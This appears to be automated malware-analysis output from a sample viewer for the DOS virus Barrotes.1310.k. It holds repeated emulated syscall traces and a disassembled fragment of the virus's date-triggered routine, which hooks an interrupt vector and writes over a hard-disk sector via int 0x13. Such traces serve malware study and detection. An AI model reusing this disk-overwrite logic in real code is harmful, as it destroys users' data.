Sample viewer

vx.netlux.org/Virus.DOS.Barrotes.1310.k

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:25:30.572426237Z 238 PC: 13252 | UNKNOWN!
2018-12-17T22:25:30.573834009Z 53 PC: 1325d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:25:30.575447059Z 54 PC: 9f771 | Get free disk space
2018-12-17T22:25:30.585309872Z 53 PC: 9f793 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:25:30.586666564Z 67 PC: 9f7be | Get or set file attributes
2018-12-17T22:25:30.593236548Z 67 PC: 9f7ca | Get or set file attributes
2018-12-17T22:25:30.599348664Z 67 PC: 9fa0b | Get or set file attributes
2018-12-17T22:25:30.604481715Z 42 PC: 132ec | Get date
0x132ec: cmp dx, 0x513
0x132f0: jne 0x13311
0x132f2: xor ax, ax
0x132f4: mov es, ax
0x132f6: mov dx, 0x49f
0x132f9: mov word ptr es:[0x70], dx
0x132fe: mov word ptr es:[0x72], ds
0x13303: mov dx, 0x80
0x13306: mov cx, 1
0x13309: mov ax, 0x301
0x1330c: mov bx, 0x100
0x1330f: int 0x13
0x13311: cmp byte ptr cs:[si + 0x3b], 1
0x13316: je 0x1332a
0x13318: push cs
0x13319: push cs
0x1331a: pop ds
0x1331b: pop es
0x1331c: mov di, 0x100
0x1331f: push di

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4507,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:55.006777952Z 238 PC: 13252 | UNKNOWN!
2018-12-25T11:51:55.009061346Z 53 PC: 1325d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:51:55.010455738Z 54 PC: 9f771 | Get free disk space
2018-12-25T11:51:55.027485004Z 53 PC: 9f793 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:55.029082744Z 67 PC: 9f7be | Get or set file attributes
2018-12-25T11:51:55.03466572Z 67 PC: 9f7ca | Get or set file attributes
2018-12-25T11:51:55.039995311Z 67 PC: 9fa0b | Get or set file attributes
2018-12-25T11:51:55.045024676Z 42 PC: 132ec | Get date
0x132ec: cmp dx, 0x513
0x132f0: jne 0x13311
0x132f2: xor ax, ax
0x132f4: mov es, ax
0x132f6: mov dx, 0x49f
0x132f9: mov word ptr es:[0x70], dx
0x132fe: mov word ptr es:[0x72], ds
0x13303: mov dx, 0x80
0x13306: mov cx, 1
0x13309: mov ax, 0x301
0x1330c: mov bx, 0x100
0x1330f: int 0x13
0x13311: cmp byte ptr cs:[si + 0x3b], 1
0x13316: je 0x1332a
0x13318: push cs
0x13319: push cs
0x1331a: pop ds
0x1331b: pop es
0x1331c: mov di, 0x100
0x1331f: push di

{"DateBased":true,"Day":19,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4507,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:55.054124261Z 238 PC: 13252 | UNKNOWN!
2018-12-25T11:51:55.054788777Z 53 PC: 1325d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:51:55.056742666Z 54 PC: 9f771 | Get free disk space
2018-12-25T11:51:55.066761694Z 53 PC: 9f793 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:55.068229907Z 67 PC: 9f7be | Get or set file attributes
2018-12-25T11:51:55.08411065Z 67 PC: 9f7ca | Get or set file attributes
2018-12-25T11:51:55.097626796Z 67 PC: 9fa0b | Get or set file attributes
2018-12-25T11:51:55.103337224Z 42 PC: 132ec | Get date
0x132ec: cmp dx, 0x513
0x132f0: jne 0x13311
0x132f2: xor ax, ax
0x132f4: mov es, ax
0x132f6: mov dx, 0x49f
0x132f9: mov word ptr es:[0x70], dx
0x132fe: mov word ptr es:[0x72], ds
0x13303: mov dx, 0x80
0x13306: mov cx, 1
0x13309: mov ax, 0x301
0x1330c: mov bx, 0x100
0x1330f: int 0x13
0x13311: cmp byte ptr cs:[si + 0x3b], 1
0x13316: je 0x1332a
0x13318: push cs
0x13319: push cs
0x1331a: pop ds
0x1331b: pop es
0x1331c: mov di, 0x100
0x1331f: push di